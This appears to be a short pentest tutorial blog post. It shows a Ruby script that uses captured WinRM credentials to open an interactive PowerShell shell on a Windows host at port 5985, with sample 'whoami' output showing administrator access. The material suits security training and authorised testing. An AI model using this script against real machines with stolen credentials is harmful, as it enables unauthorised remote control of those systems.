Winrm Shell

Windows Remote Management, or WinRM, is a Windows-native built-in remote management protocol in its simplest form that uses Simple Object Access Protocol to interface with remote computers and servers, as well as Operating Systems and applications. Source: link

If you have obtained the credentials of winrm and you are able to access port 5985/wsman, you may use the below PoC to obtain a powershell shell.

The default HTTP port for winrm is 5985.

[email protected]:~# gem install winrm
[email protected]:~# cat winrm_shell.rb
require 'winrm'

conn = WinRM::Connection.new(
  endpoint: 'http://192.168.78.185:5985/wsman',
  user: 'administrator',
  password: 'administrator123',
)

command=""

conn.shell(:powershell) do |shell|
    until command == "exit\n" do
        print "PS > "
        command = gets        
        output = shell.run(command) do |stdout, stderr|
            STDOUT.print stdout
            STDERR.print stderr
        end
    end    
    puts "Exiting with code #{output.exitcode}"
end

[email protected]:~#
[email protected]:~#

Run the ruby script and obtain the shell. Make sure to install winrm before running the PoC above.

[email protected]:~# ruby winrm_shell.rb
PS > whoami
test\administrator
PS >

Leave a Comment